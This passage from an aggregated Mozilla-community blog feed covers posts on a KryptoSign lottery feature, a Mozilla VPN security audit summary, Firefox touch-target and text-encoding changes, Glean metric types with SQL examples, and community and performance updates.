The UI for doing this is quite simple, as you’d hope and expect from KryptoSign. There’s an action icon on the document now:

screenshot of menu option to pick a winner from the signers of a document

When you’re ready to pick a winner, it’s pretty easy. Lock the document, and hit the button:

Of note, to pick a winner we’re collecting to 0.05 ETH from you to cover the cost of the 2 LINK required to invoke the VRF on mainnet. You don’t need your own LINK and all the gas-incurring swapping that would imply. Phew! The user approves a single transaction with their wallet (including gas to interact with the smart contract) and they’re done.

Our initial users really wanted the on-chain trust of a VRF, and are willing to pay for it so their communities can trust the draw, but for other use cases you have in mind, maybe it’s overkill? Let us know! We’ll continue to build upon KryptoSign as long as people find useful things to do with it.

Finally, big props to our team who worked through some rough patches with calling the Chainlink VRF contract. Blockchain is weird, yo! This release saw engineering contributions from Neo Cho, Ryan Ouyang, and Josh Peters. Thanks!

— Mark


Celebrating 10k KryptoSign users with an on-chain lottery feature! was originally published in Block::Block on Medium, where people are continuing the conversation by highlighting and responding to this story.

Mozilla Security BlogMozilla VPN Security Audit

To provide transparency into our ongoing efforts to protect your privacy and security on the Internet, we are releasing a security audit of Mozilla VPN that Cure53 conducted earlier this year.

The scope of this security audit included the following products:

  • Mozilla VPN Qt5 App for macOS
  • Mozilla VPN Qt5 App for Linux
  • Mozilla VPN Qt5 App for Windows
  • Mozilla VPN Qt5 App for iOS
  • Mozilla VPN Qt5 App for Android

Here’s a summary of the items discovered within this security audit that were medium or higher severity:

  • FVP-02-014: Cross-site WebSocket hijacking (High)
    • Mozilla VPN client, when put in debug mode, exposes a WebSocket interface to localhost to trigger events and retrieve logs (most of the functional tests are written on top of this interface). As the WebSocket interface was used only in pre-release test builds, no customers were affected.  Cure53 has verified that this item has been properly fixed and the security risk no longer exists.
  • FVP-02-001: VPN leak via captive portal detection (Medium)
    • Mozilla VPN client allows sending unencrypted HTTP requests outside of the tunnel to specific IP addresses, if the captive portal detection mechanism has been activated through settings.  However, the captive portal detection algorithm requires a plain-text HTTP trusted endpoint to operate. Firefox, Chrome, the network manager of MacOS and many applications have a similar solution enabled by default. Mozilla VPN utilizes the Firefox endpoint.  Ultimately, we have accepted this finding as the user benefits of captive portal detection outweigh the security risk.
  • FVP-02-016: Auth code could be leaked by injecting port (Medium)
    • When a user wants to log into Mozilla VPN, the VPN client will make a request to https://vpn.mozilla.org/api/v2/vpn/login/windows to obtain an authorization URL. The endpoint takes a port parameter that will be reflected in a <img> element after the user signs into the web page. It was found that the port parameter could be of an arbitrary value. Further, it was possible to inject the @ sign, so that the request will go to an arbitrary host instead of localhost (the site’s strict Content Security Policy prevented such requests from being sent). We fixed this issue by improving the port number parsing in the REST API component. The fix includes several tests to prevent similar errors in the future.

If you’d like to read the detailed report from Cure53, including all low and informational items, you can find it here.

More information on the issues identified in this report can be found in our MFSA2021-31 Security Advisory published on July 14th, 2021.

The post Mozilla VPN Security Audit appeared first on Mozilla Security Blog.

Mozilla Open Policy & Advocacy BlogMozilla Mornings on the Digital Markets Act: Key questions for Parliament

On 13 September, Mozilla will host the next installment of Mozilla Mornings – our regular event series that brings together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

For this installment, we’re checking in on the Digital Markets Act. Our panel of experts will discuss the key outstanding questions as the debate in Parliament reaches its fever pitch.

Speakers

Andreas Schwab MEP
IMCO Rapporteur on the Digital Markets Act
Group of the European People’s Party

Mika Shah
Co-Acting General Counsel
Mozilla

Vanessa Turner
Senior Advisor
BEUC

With opening remarks by Raegan MacDonald, Director of Global Public Policy, Mozilla

Moderated by Jennifer Baker
EU technology journalist

 

Logistical details

Monday 13 September, 17:00 – 18:00 CEST

Zoom Webinar

Register *here*

Webinar login details to be shared on day of event

The post Mozilla Mornings on the Digital Markets Act: Key questions for Parliament appeared first on Open Policy & Advocacy.

Niko MatsakisNext CTCFT Meeting: 2021-09-20

Hold the date! The next Cross Team Collaboration Fun Times meeting will be 2021-09-20. We’ll be using the “Asia-friendly” time slot of 21:00 EST.

What will the talks be about?

A detailed agenda will be announced in a few weeks. Current thinking however is to center the agenda on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use on all kinds of interesting domains, such as game development, cryptography, machine learning, formal verification, and embedded development. If you run an interest group and I didn’t list your group here, perhaps you want to get in touch! We’ll be talking about how these groups operate and how we can do a better job of connecting interest groups with the Rust org.

Will there be a social hour?

Absolutely! The social hour has been an increasingly popular feature of the CTCFT meeting. It will take place after the meeting (22:00 EST).

How can I get this on my calendar?

The CTCFT meetings are announced on this google calendar.

Wait, what about August?

Perceptive readers will note that there was no CTCFT meeting in August. That’s because I and many others were on vacation. =)

Firefox Add-on ReviewsBoost your writing skills with a browser extension

Whatever kind of writing you do—technical documentation, corporate communications, Harry Potter-vampire crossover fan fiction—it likely happens online. Here are some great browser extensions that will benefit anyone who writes on the web. Get grammar help, productivity tools, and other strong writing aids… 

LanguageTool

It’s like having your own copy editor with you wherever you write on the web. Language Tool – Grammar and Spell Checker will make you a better writer in 25+ languages. 

More than just a spell checker, LanguageTool also…

  • Recognizes common misuses of similar sounding words (e.g. there/their or your/you’re)
  • Works on social media sites and email
  • Offers alternate phrasing and style suggestions for brevity and clarity

Dictionary Anywhere

Need a quick word definition? With Dictionary Anywhere just double-click any word you find on the web and get an instant pop-up definition. 

You can even save and download words and their definitions for later offline reference. 

<figcaption>Dictionary Anywhere — no more navigating away from a page just to get a word check.</figcaption>

Dark Background and Light Text

Give your eyes a break, writers. Dark Background and Light Text makes staring at blinking words all day a whole lot easier on your lookers. 

Really simple to use out of the box. Once installed, the extension’s default settings automatically flip the colors of every web page you visit. But if you’d like more granular control of color settings, just click the extension’s toolbar button to access a pop-up menu that lets you customize color schemes, set page exceptions for sites you don’t want colors inverted, and more simple controls. 

<figcaption>Dark Background and Light Text goes easy on the eyes.</figcaption>

Clippings

If your online writing requires the repeated use of certain phrases (for example, work email templates or customer support responses), Clippings can be a huge time saver. 

Key features…

  • Create a practically limitless library of saved phrases
  • Paste your clippings anywhere via context menu
  • Organize batches of clippings with folders and color coded labels
  • Shortcut keys for power users
  • Extension supported in English, Dutch, French, German, and Portuguese (Brazil)
<figcaption>Clippings handles bulk cutting/pasting. </figcaption>

We hope one of these extensions helps your words pop off the screen. Some writers may also be interested in this collection of great productivity extensions for optimizing written project plans. Feel free to explore thousands of other potentially useful extensions on addons.mozilla.org

Eitan IsaacsonHTML AQI Gauge

I needed a meter to tell me what the air quality is like outside. Now I know!

If you need one as well, or if you are looking for an accessible gauge for anything else, here you go.

You can also mess with it on Codepen.

AQI

Dennis SchubertWebCompat Tale: Touching Clickable Things

Did you know your finger is larger than one pixel? I mean, sure, your physical finger should always be larger than one pixel, unless your screen has a really low resolution. But did you know that when using Firefox for Android, your finger is actually 6x7 millimeters large? Now you do!

Unlike a pixel-perfect input device like a mouse or even a laptop’s trackpad, your finger is weird. Not only is it all soft and squishy, it also actively obstructs your view when touching things on the screen. When you use a web browser and want to click on a link, it is surprisingly difficult to hit it accurately with the center of your fingertip, which is what your touchscreen driver sends to the browser. To help you out, your friendly Firefox for Android helps you out by slightly enlarging the “touch point”.

Usually, this works fine and is completely transparent to users. Sometimes, however, it breaks things.

Here is an example of a clever CSS-only implementation of a menu with collapsible sub-navigation that I extracted from an actual Web Compatibility bug report I looked at earlier. Please do not actually use this, this is broken by design to make a point. :) Purely visual CSS declarations have been omitted for brevity.

Source:

<style>
  #menu-demo li ul {
    display: none;
  }

  #menu-demo li:hover ul {
    display: block;
  }
</style>
<section id="menu-demo">
  <ul>
    <li><a href="#menu-demo">One</a></li>
    <li>
      <span>Two with Subnav</span>
      <ul>
        <li><a href="#menu-demo">Two &gt; One</a></li>
        <li><a href="#menu-demo">Two &gt; Two</a></li>
      </ul>
    </li>
    <li><a href="#menu-demo">Three</a></li>
  </ul>
</section>

Result:

Now, just imagine that on Desktop, this is a horizontal menu and not a vertical list, but I’m too lazy to write media queries right now. It works fine on Desktop. However, if you try this in Firefox for Android, you will find that it’s pretty much impossible to select the second entry, and you will just hit “One” or “Three” most of the time.

To understand what’s going on here, we have to talk about two things: the larger “finger radius” I explained earlier, and the rules by which Firefox detects the element the user probably wanted to click on.

Touch Point expansion

The current touch point expansion settings, as set by the ui.mouse.radius.* preferences in about:config, are: 5mm to the top; 3mm to the left; 3mm to the right; 2mm to the bottom. There probably is a good reason why the top/bottom expansion is asymmetric, and I assume this has something to do with viewing angles or how your finger is shaped, but I actually don’t know.

To visualize this, I prepared a little annotated screenshot of how this “looks like” on my testing Android device:

A screenshot of the live menu demo from above. A red dot in the middle of "Two with Subnav" marks the position where the user placed the middle of their finger, a blue border marks the outline of the area Firefox considers "touched". The blue outline spans well into the "One" menu item.

The red dot marks the center of the touch point, the blue outline marks the area as expanded by Firefox for Android. As you can see, the expanded touch area covers part of the previous menu item, “One”. If you’d try to touch lower on the item, then the bottom expansion will start to cover parts of the “Three” item. In this example, you have a 9px window to actually hit “Two with Subnav”. On my device, that’s roughly 0.9mm. Good luck with that!

With this expansion in mind, you might wonder why you’re not hitting the wrong items all the time. Fair question.

“Clickable” elements

Firefox doesn’t just click on every element inside this expanded area. Instead, Firefox tries to find the “clickable element closest to the original touch point”. If all three <li>s contained links, then this wouldn’t be an issue: links are clickable elements, and “Two with Subnav” would, without a doubt, be the closest. However, in this example, it’s not a link, and then the rules are a little bit more complicated.

Things Firefox considers “clickable” for the purpose of finding the right element:

  • <a>s.
  • <button>, <input>, <select>, <textarea>, <label>, and <iframe>.
  • Elements with JavaScript listeners for:
    • click, mousedown, mouseup
    • touchstart, touchend
    • pointerdown, pointerup
  • Elements with contenteditable="true".
  • Elements with role="button".
  • Elements with cursor: pointer assigned via CSS.

Unfortunately, none of the rules above are true for the “Two with Subnav” element in the example above. And this means that the “closest clickable element” to the touch point here is, well, “One”. And so, Firefox dispatches the click event to that one.

Matching any of the conditions, even simply changing the cursor via CSS, would provide the browser with enough context to do “the right thing” here.

Conclusion

This issue, once again, is one of those cases where I do not yet have a satisfying outcome. I wrote a message to the site’s authors, but given the site is based on a Joomla template from 2013, I do not have high hopes here. As for changes inside Firefox, we could treat elements with :hover styling and mouseover listeners as “clickable”, and I filed a bug to suggest as much, but I’m not yet convinced this is the right thing to do. From what I can tell, neither Chrome nor Safari do a similar expansion, so just dropping it from Firefox is another idea. But I kinda like the way it makes things better 99.9% of the time.

In any case, this serves as yet another reminder of why having semantically correct markup is important. Not only do attributes like role="button" on clickable elements help out anyone relying on accessibility features and tooling, browsers also depend on these kinds of hints. Use the tools you have, there’s a reason why the role attribute is part of the web. :)

Update from 2021-08-25

Good news! The developer responsible for the site has responded, and they did fix the issue by adding role="button" to the links. Huge success!

Mozilla Performance BlogPerformance Sheriff Newsletter (July 2021)

In July there were 105 alerts generated, resulting in 20 regression bugs being filed on average 6.6 days after the regressing change landed.

Welcome to the July 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by some details on how we’re growing the test engineering team. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.4 days
  • 88% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 2.7 days
  • 89% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (July 2021)

It’s initially disappointing to see the alert to bug increase last month, however after some investigation it appears that a single alert has thrown this out. With fewer alerts (as we’ve seen over the last two months), any that exceed our targets have an increased impact on our average response times. In this case, it was this alert for a 2% glvideo regresion. The backfill bot did trigger backfills for this job, however the culprit commit still wasn’t clear. Even after over 250 retriggers, the sheriff was unable to determine a culprit. Perhaps a better way to measure the effectiveness of the auto backfills is to look at the average time from alert to bug where we meet the threshold, to filter out alerts that are particularly challenging for our sheriffs.

Join the team!

I’m excited to share that after the performance test engineering team is currently hiring! We have ambitious plans to modernise and unify our performance test frameworks, automate more of our regression sheriffing workflows, increase the accuracy and sensitivity of our regression detection, and support the culture of performance at Mozilla. By growing the team we hope to accelerate these efforts and to ensure every Firefox release performs better than the last.

We’re looking for candidates with 2-5 years software development experience. Whilst not a requirement, these roles would suit individuals with experience or interest in performance, profiling, data analysis, machine learning, TCP/IP, and web technologies. Experience with Python and JavaScript would also be beneficial as these will be used extensively in the role.

If you’re interested in helping us to build the future of performance testing at Mozilla, and to have a direct impact on the performance of Firefox, then please take a look over the following job descriptions:

Note that the first role is based in Toronto as we have a number of team members in this location, and currently feel that hiring in this location would provide a better opportunity for the successful candidate. The senior role is remote US and Canada.

You can learn more about the team on our wiki page, and if you’re interested in joining us, you can apply directly from the job descriptions above. If these positions don’t interest you, but you like the idea of working to keep the internet open and accessible to all, take a look over our other open positions.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for July can be found here (for those with access).

Henri SivonenThe Text Encoding Submenu Is Gone

For context, please see Character Encoding Menu in 2014, Text Encoding Menu in 2021, and A Look at Encoding Detection and Encoding Menu Telemetry from Firefox 86.

Firefox 91 was released two weeks ago. This is the first release that does not have a Text Encoding submenu. Instead, the submenu has been replaced with a single menu item called to Repair Text Encoding. It performs the action that was previously performed by the item Automatic in the Text Encoding submenu: It runs chardetng with UTF-8 as a permitted outcome and ignoring the top-level domain.

The Repair Text Encoding menu item is in the View menu, which is hidden by default on Windows and Linux. The action is also available as an optional toolbar button (invoke the context menu on empty space in the toolbar and choose Customize Toolbar…). On Windows and Linux, you can invoke the menu item from the keyboard by pressing the v key while holding the alt key and then pressing the c key. (The keys may vary with the localization.)

What Problem Does “Repair Text Encoding” Solve?

  1. Sometimes the declared encoding is wrong, and the Web Platform would become more brittle if we started second-guessing the declared encoding automatically without user action.

    The typical case is that university faculty have created content over the years that is still worthwhile to read, and the old content is in a legacy encoding. However, independently of the faculty, the administrator has either explicitly or as a side effect of server software update caused the server configuration to claim UTF-8 server-wide even though this is wrong for old content. When the context is in the Latin script, the result is still readable. When the content is in a non-Latin script, the result is completely unreadable (without this feature).

  2. For non-Latin scripts, unlabeled UTF-8 is completely unreadable. Fixing this problem without requiring user action and also without making the Web Platform more brittle is a hard problem. There is a separate write-up on that topic alone. This problem might get solved one day in a way that does not involve user action but not today.

Why Remove the Other Submenu Items?

  • Supporting the specific manually-selectable encodings caused significant complexity in the HTML parser when trying to support the feature securely (i.e. not allowing certain encodings to be overridden). With the current approach, the parser needs to know of one flag to force chardetng, which the parser has to be able to run in other situations anyway, to run. Previously, the parser needed to keep track of a specific manually-specified encoding alongside the encoding information for the Web sources.

    Indeed, when implementing support for declaring the encoding via the bogo XML declaration, the above-mentioned complexity got in the way, and I wish I had replaced the menu with a single item before implementing the bogo XML declaration support. Now, I wanted to get rid of the complexity before aligning meta charset handling with WebKit and Blink.

  • Elaborate UI surface for a niche feature risks the whole feature getting removed, which is bad if the feature is still relevant to (a minority of) users. (Case in point: The Proton UI refresh removed the Text Encoding menu entry point from the hamburger menu.)

  • Telemetry showed users making a selection from the menu when the encoding of the page being overridden had come from a previous selection from the menu. This suggested that users aren’t that good at choosing correctly manually.

Why Not Remove the Whole Thing?

Chrome removed their menu altogether as part of what they called Project Eraser. (Amusingly, this lead to a different department of Google publishing a support article about using other browsers to access this functionality.) Mobile versions of Chrome, Safari, and Firefox don’t have the menu, either. So why not just follow Chrome?

Every time something in this area breaks intentionally or accidentally, feedback from Japan shows up relatively quickly. That’s the main reason why I believe users in Japan still care about having the ability to override the encoding of misconfigured pages. (That’s without articulating any particular numeric telemetry threshold for keeping the feature. However, telemetry confirms that the feature is relevant to the largest number of distinct telemetry submitters, both in absolute numbers and in region-total-relative numbers, in Japan.)

If we removed the feature, we’d remove a reason for these users to stay with Firefox. Safari and Gnome Web still have more elaborate encoding override UI built in (the list of encodings in both is questionably curated but the lists satisfy the Japanese use cases), and there are extensions for Chrome.

Shouldn’t This Be an Extension?

The built-in UI action in Firefox is more discoverable, more usable, and safer against the user getting baited into self-XSS than the Chrome extensions. Retaining the safety properties but moving the UI to an extension would increase implementation complexity while reducing discoverability—i.e. would help fewer users at a higher cost.

Removing the engine feature and leaving to an extension to rewrite headers of the HTTP responses (as in Chrome) would:

  • Give Chrome an advantage on day one by the extension(s) for Chrome actually already existing.
  • Fail to help the users who don’t discover an extension.
  • Regress usability by about a decade due to the extension UI being unaware of what’s going on inside the engine.
  • Remove self-XSS protections.

The Talospace ProjectOpenPOWER Firefox JIT update

As of this afternoon, the Baseline Interpreter-only form of the OpenPOWER JIT (64-bit little-endian) now passes all of the JIT tests except for the Wasm ones, which are being actively worked on. Remember, this is just the first of the three phases and we need all three for the full benefit, but it already yields a noticeable boost in my internal tests over the C++ interpreter. The MVP is Baseline Interpreter and Wasm, so once it passes the Wasm tests as well, it's time to pull it current with 91ESR. You can help.

Data@MozillaThis Week in Glean: Why choosing the right data type for your metric matters

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

One of my favorite tasks that comes up in my day to day adventure at Mozilla is a chance to work with the data collected by this amazing Glean thing my team has developed. This chance often arises when an engineer needs to verify something, or a product manager needs a quick question answered. I am not a data scientist (and I always include that caveat when I provide a peek into the data), but I do understand how the data is collected, ingested, and organized and I can often guide people to the correct tools and techniques to find what they are looking for.

In this regard, I often encounter challenges in trying to read or analyze data that is related to another common task I find myself doing: advising engineering teams on how we intend Glean to be used and what metric types would best suit their needs. A recent example of this was a quick Q&A for a group of mobile engineers who all had similar questions. My teammate chutten and I were asked to explain the differences between Counter Metrics and Event Metrics, and try and help them understand the situations where each of them were the most appropriate to use. It was a great session and I felt like the group came away with some deeper understanding of the Glean principles. But, after thinking about it afterwards, I realized that we do a lot of hand-wavy things when explaining why not to do things. Even in our documentation, we aren’t very specific about the overhead of things like Event Metrics. For example, from the Glean documentation section regarding “Choosing a Metric Type” in a warning about events:

“Important: events are the most expensive metric type to record, transmit, store and analyze, so they should be used sparingly, and only when none of the other metric types are sufficient for answering your question.”

This is sufficiently scary to make me think twice about using events! But what exactly do we mean by “they are the most expensive”? What about recording, transmitting, storing, and analyzing makes them “expensive”? Well, that’s what I hope to dive into a little deeper with some real numbers and examples, rather than using scary hand-wavy words like “expensive” and “should be used sparingly”. I’ll mostly be focusing on events here, since they contain the “scariest” warning. So, without further ado, let’s take a look at some real comparisons between metric types, and what challenges someone looking at that data may encounter when trying to answer questions about it or with it.

Our claim is that events are expensive to record, store and transmit; so let’s start by examining that a little closer. The primary API surface for the Event Metric Type in Glean is the record() function. This function also takes an optional collection of “extra” information in a key-value shape, which is supposed to be used to record additional state that is important to the event. The “extras”, along with the category, name, and (relative) timestamp, makes up the data that gets recorded, stored, and eventually transmitted to the ingestion pipeline for storage in the data warehouse.

Since Glean is built with Rust and then provides SDKs in various target languages, one of the first things we have to do is serialize the data from the shiny target language object that Glean generates into something we can pass into the Rust that is at the heart of Glean. It is worth noting that the Glean JavaScript SDK does this a little differently, but the same ideas should apply about events. A similar structure is used to store the data and then transmit it to the telemetry endpoint when the Events Ping is assembled. A real-world example of what this serialized event, coming from Fenix’s “Entered URL” event would look like this JSON:

{
"category": "events",
"extra": {
"autocomplete": "false"
},
"name": "entered_url",
"timestamp": 33191
}

A similar amount of data would be generated every time the metric was recorded, stored and transmitted. So, if the user entered in 10 URLs, then we would record this same thing 10 times, each with a different relative timestamp. To take a quick look at how this affects using this data for analysis: if I only needed to know how many users interacted with this feature and how often, I would have to count each event with this category and name for every user. To complicate the analysis a bit further, Glean doesn’t transmit events one at a time, it collects all events during a “session” (or if it hits 500 events recorded) and transmits them as an array within an Event Ping. This Event Ping then becomes a single row in the data, and nested in a column we find the array of events. In order to even count the events, I would need to “unnest” them and flatten out the data. This involves cross joining each event in the array back to the parent ping record in order to even get at the category, name, timestamp and extras. We end up with some SQL that looks like this (WARNING: this is just an example. Don’t try this, it could be expensive and shouldn’t work because I left out the filter on the submission date):

SELECT *
FROM fenix
CROSS JOIN UNNEST (events) AS event

For an average day in Fenix we see 75-80 million Event Pings from clients on our release version, with an average of a little over 8 events per ping. That adds up to over 600 million events per day, and just for Fenix! So when we do this little bit of SQL flattening of the data structure, we end up manipulating over a half a billion records for a single day, and that adds up really quickly if you start looking at more than one day at a time. This can take a lot of computer horsepower, both in processing the query and in trying to display the results in some visual representation. Now that I have the events flattened out, I can finally filter for the category and name of the event I am looking for and count how many of that specific event is present. Using the Fenix event “entered_url” from above, I end up with something like this to count the number of clients and events:

SELECT
COUNT(DISTINCT client_info.client_id) AS client_count,
COUNT(*) AS event_count,
DATE(submission_timestamp) AS event_date
FROM
fenix.events
CROSS JOIN
UNNEST(events.events) AS event -- Yup, event.events, naming=hard
WHERE
submission_timestamp >= ‘2021-08-12’
AND event.category = ‘events’
AND event.name = ‘entered_url’
GROUP BY
event_date
ORDER BY
event_date

Our query engine is pretty good, this only takes about 8 seconds to process and it has narrowed down the data it needs to scan to a paltry 150 GB, but this is a very simple analysis of the data involved. I didn’t even dig into the “extra” information, which would require yet another level of flattening through UNNESTing the “extras” array that they are stored in in each individual event.

As you can see, this explodes pretty quickly into some big datasets for just counting things. Don’t get me wrong, this is all very useful if you need to know the sequence of events that led the client to entering a URL, that’s what events are for after all. To be fair, our lovely Data Engineering folks have taken the time and trouble to create views where these events are already unnested, and so I could have avoided doing it manually and instead use the automatically flattened dataset. I wanted to better illustrate the additional complexity that goes on downstream from events and working with the “raw” data seemed the best way to do this.

If we really just need to know how many clients interact with a feature and how often, then a much lighter weight alternative recommended by the Glean team would be a Counter Metric. To return to what the data representation of this looks like, we can look at an internal Glean metric that counts the number of times Fenix enters the foreground per day (since the metrics ping is sent once per day). It looks like this:

"counter": {
"glean.validation.foreground_count": 1
}

No matter how many times we add() to this metric, it will always take up that same amount of space right there, only the value would change. So, we don’t end up with one record per event, but a single value that represents the count of the interactions. When I go to query this and find out how many clients this involved and how many times the app moved to the foreground of the device, I can do something like this in SQL (without all the UNNESTing):

SELECT
COUNT(DISTINCT client_info.client_id) AS client_count,
SUM(m.metrics.counter.glean_validation_foreground_count) AS foreground_count,
DATE(submission_timestamp) AS event_date
FROM
org_mozilla_firefox.metrics AS m
WHERE
submission_timestamp >= '2021-08-12'
GROUP BY
event_date
ORDER BY
event_date

This runs in just under 7 seconds, but the query only has to scan about 5 GB of data instead of the 150 GB we saw with the event. And, for comparison, there were only about 8 million of those entered_url events per day compared to 80 million foreground occurrences per day. Even with many more incidents, the amount of data scanned by the query that used the Counter Metric Type to count things scanned 1/30th the amount of data. It is also fairly obvious which query is easier to understand. The foreground count is just a numeric counter value stored in a single row in the database along with all of the other metrics that are collected and sent on the daily metrics ping, and it ultimately results in selecting a single column value. Rather than having to unnest arrays and then counting them, I can simply SUM the values stored in the column for the counter to get my result.

Events do serve a beautiful purpose, like building an onboarding funnel to determine how well we retain users and what onboarding path results in that. We can’t do that with counters because they don’t have the richness to be able to show the flow of interactions through the app. Counters also serve a purpose, and can answer questions about the usage of a feature with very little overhead. I just hope that as you read this, you will consider what questions you need to answer and remember that there is probably a well-suited Glean Metric Type just for your purpose, and if there isn’t, you can always request a new metric type! The Glean Team wants you to get the most out of your data while being true to our lean data practices, and we are always available to discuss which metric type is right for your situation if you have any questions.

Support.Mozilla.OrgWhat’s up with SUMO – August 2021

Hey SUMO folks,

Summer is here. Despite the current situation of the world, I hope you can still enjoy a bit of sunshine and the breezing air wherever you are. And while vacations are planned, SUMO is still busy with lots of projects and releases. So let’s get the recap started!

Welcome on board!

  1. Welcome Julie and Rowan! Thank you for diving into the KB world.

Community news

  • One of our goal for Q3 this year is to revamp the onboarding experience for contributor that is focused on the /get-involved page. To support this work, we’re currently conducting a survey to understand how effective is the current onboarding information we provide. Please fill out the survey if you haven’t and share it to your community and fellow contributors!
  • No Kitsune update for this month. Check out SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in July!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

Month Page views Vs previous month
Jul 2021 8,237,410 -10.81%
* KB pageviews number is a total of KB pageviews for /en-US/ only

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre Mozinet
  4. Romado33
  5. K_alex

KB Localization

Top 10 locale based on total page views

Locale Apr 2021 pageviews (*) Localization progress (per Jul, 9)(**)
de 8.62% 99%
zh-CN 6.92% 100%
pt-BR 6.32% 64%
es 6.22% 45%
fr 5.70% 91%
ja 4.13% 55%
ru 3.61% 99%
it 2.08% 100%
pl 2.00% 84%
zh-TW 1.44% 6%
* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Soucet
  3. Jim Spentzos
  4. Michele Rodaro
  5. Mark Heijl

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jul 2021 3175 72.13% 15.02% 81.82%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel Jul 2021
Total conv Conv interacted
@firefox 2967 341
@FirefoxSupport 386 270

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

  • FX for Android V91 (August 10)
  • FX for iOS V36 (August 10)
    • Fixes: Tab preview not showing in tab tray

Other products / Experiments

  • Mozilla VPN V2.5 (September 8)
    • Multi-hop: Using multiple VPN servers. VPN server chaining method gives extra security and privacy.
    • Support for Local DNS: If there is a need, you can set a custom DNS server when the Mozilla VPN is on.
    • Getting help if you cannot sign in: ‘get support’ improvements.

Upcoming Releases

  • FX Desktop 92, FX Android 92, FX iOS V37 (September 7)
  • Updates to FX Focus (October)

Shout-outs!

  • Thanks to Felipe Koji for his great work on Social Support.
  • Thanks to Seburo for constantly championing support for Firefox mobile.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

Hacks.Mozilla.OrgSpring cleaning MDN: Part 2

An illustration of a blue coloured dinosaur sweeping with a broom

Illustration by Daryl Alexsy

 

The bags have been filled up with all the things we’re ready to let go of and it’s time to take them to the charity shop.

Archiving content

Last month we removed a bunch of content from MDN. MDN is 16 years old (and yes it can drink in some countries), all that time ago it was a great place for all of Mozilla to document all of their things. As MDN evolved and the web reference became our core content, other areas became less relevant to the overall site. We have ~11k active pages on MDN, so keeping them up to date is a big task and we feel our focus should be there.

This was a big decision and had been in the works for over a year. It actually started before we moved MDN content to GitHub. You may have noticed a banner every now and again, saying certain pages weren’t maintained. Various topics were removed including all Firefox (inc. Gecko) docs, which you can now find here. Mercurial, Spidermonkey, Thunderbird, Rhino and XUL were also included in the archive.

So where is the content now?

It’s saved – it’s in this repo. We haven’t actually deleted it completely. Some of it is being re-hosted by various teams and we have the ability to redirect to those new places. It’s saved in both it’s rendered state and the raw wiki form. Just. In. Case.

The post Spring cleaning MDN: Part 2 appeared first on Mozilla Hacks - the Web developer blog.

Cameron KaiserUnplanned Floodgap downtime

Floodgap is down due to an upstream circuit cut and TenFourFox users may get timeouts when checking versions. All Floodgap services including web, gopher and E-mail are affected. The telco is on it, but I have no ETA for repair. If the downtime will be prolonged, I may host some services temporarily on a VPS.